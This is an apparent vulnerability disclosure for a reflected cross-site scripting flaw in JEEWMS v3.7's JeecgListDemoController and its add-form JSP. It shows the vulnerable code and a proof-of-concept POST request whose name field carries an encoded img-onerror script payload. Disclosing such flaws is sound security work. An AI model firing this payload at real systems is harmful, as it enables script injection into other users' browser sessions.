Summury

A reflected cross-site scripting (XSS) vulnerability has been discovered in JEEWMS v3.7 in the JeecgListDemoController module. The vulnerability allows attackers to inject malicious JavaScript through the name parameter, which is then reflected in the response without proper sanitization, leading to execution of arbitrary JavaScript code in the victim’s browser context.

Authentication: Yes Exploitable: Remote

Detail

Backend Controller

File: src/main/java/com/jeecg/demo/controller/JeecgListDemoController.java

Method: doAdd() (Lines 311-327)

Mapping: @RequestMapping(params = "doAdd")

Vulnerable Code Flow:

@RequestMapping(params = "doAdd")
@ResponseBody
public AjaxJson doAdd(JeecgDemoEntity jeecgDemo, HttpServletRequest request) {
    // User input is bound to entity
    // If save fails, user may be redirected to form page
    // with input values pre-populated from request
    jeecgDemoService.save(jeecgDemo);
    return j;
}

Frontend JSP (Reflected Output)

File: webpage/com/jeecg/demo/jeecgDemo-add.jsp (Line 26)

Vulnerable Code:

<input id="name" name="name" type="text" style="width: 150px" class="inputxt"
       datatype="*" value='${jeecgDemoPage.name}'/>

Critical Issue: User-controlled input is directly embedded in HTML attribute without sanitization.

POC

  1. Request with XSS payload
POST /jeewms/jeecgListDemoController.do?doAdd HTTP/1.1
Host: localhost:8081
Sec-Fetch-Site: same-origin
Origin: <http://localhost:8081>
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: empty
Accept: application/json, text/javascript, */*; q=0.01
sec-ch-ua-platform: "Windows"
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua-mobile: ?0
Sec-Fetch-Mode: cors
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONID=21B9CFD8FBBE6D693DEBC0F9690E5870; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=2030
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Referer: <http://localhost:8081/jeewms/jeecgListDemoController.do?goAdd&_=1770819352096>
Content-Length: 203

id=&createDate=&createBy=&createName=&updateBy=&updateDate=&updateName=&name=%22%3E%3Cimg+src%3D1+onerror%3Dalert(1)%3E&age=1&birthday=&depId=&email=1%40qq.com&phone=13888888888&salary=&status=N&content=

image.png

image.png